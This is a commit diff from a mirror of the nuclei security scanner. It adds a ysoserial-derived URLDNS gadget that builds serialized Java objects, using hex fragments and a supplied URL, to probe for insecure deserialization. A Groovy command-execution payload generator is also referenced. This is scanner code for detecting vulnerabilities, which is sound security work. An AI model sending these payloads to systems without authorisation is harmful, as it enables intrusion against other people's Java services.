daffainfo
/
nuclei
mirror of https://github.com/daffainfo/nuclei.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Added urldns gadget from ysoserial (#1985)

dev
Ice3man 2022-05-17 14:33:17 +05:30 committed by GitHub
parent 27bdd8c642
commit 062fe6d01e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 22 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

28
v2/pkg/protocols/common/helpers/deserialization/java.go
View File

@ -5,6 +5,7 @@ import (
"compress/gzip" "compress/gzip"
"encoding/base64" "encoding/base64"
"encoding/hex" "encoding/hex"
"net/url"
"strings" "strings"
) )
@ -119,17 +120,32 @@ func generateGroovy1Payload(cmd string) []byte {
} }
// generateDNSPayload generates DNS interaction deserialization paylaod for a DNS Name. // generateDNSPayload generates DNS interaction deserialization paylaod for a DNS Name.
// Based on Gabriel Lawrence gadget // Taken from ysoserial DNS gadget.
func generateDNSPayload(url string) []byte { func generateDNSPayload(URL string) []byte {
parsed, err := url.Parse(URL)
if err != nil {
return nil
}
buffer := &bytes.Buffer{} buffer := &bytes.Buffer{}
hostname := parsed.Hostname()
prefix, _ := hex.DecodeString("ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C770800000010000000017372000C6A6176612E6E65742E55524C962537361AFCE47203000749000868617368436F6465490004706F72744C0009617574686F726974797400124C6A6176612F6C616E672F537472696E673B4C000466696C6571007E00034C0004686F737471007E00034C000870726F746F636F6C71007E00034C000372656671007E00037870FFFFFFFFFFFFFFFF7400") prefix, _ := hex.DecodeString("ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C770800000010000000017372000C6A6176612E6E65742E55524C962537361AFCE47203000749000868617368436F6465490004706F72744C0009617574686F726974797400124C6A6176612F6C616E672F537472696E673B4C000466696C6571007E00034C0004686F737471007E00034C000870726F746F636F6C71007E00034C000372656671007E00037870FFFFFFFFFFFFFFFF7400")
buffer.Write(prefix) buffer.Write(prefix)
buffer.WriteString(string(rune(len(url))))
buffer.WriteString(url)
suffix, _ := hex.DecodeString("74000071007E00057400056874747073707874001968747470733A2F2F746573742E6A6578626F73732E696E666F78")
buffer.Write(suffix)
buffer.WriteString(string(rune(len(hostname))))
buffer.WriteString(hostname)
middle, _ := hex.DecodeString("74000071007E0005740005")
buffer.Write(middle)
buffer.WriteString(parsed.Scheme)
middle, _ = hex.DecodeString("70787400")
buffer.Write(middle)
buffer.WriteString(string(rune(len(URL))))
buffer.WriteString(URL)
suffix, _ := hex.DecodeString("78")
buffer.Write(suffix)
return buffer.Bytes() return buffer.Bytes()
} }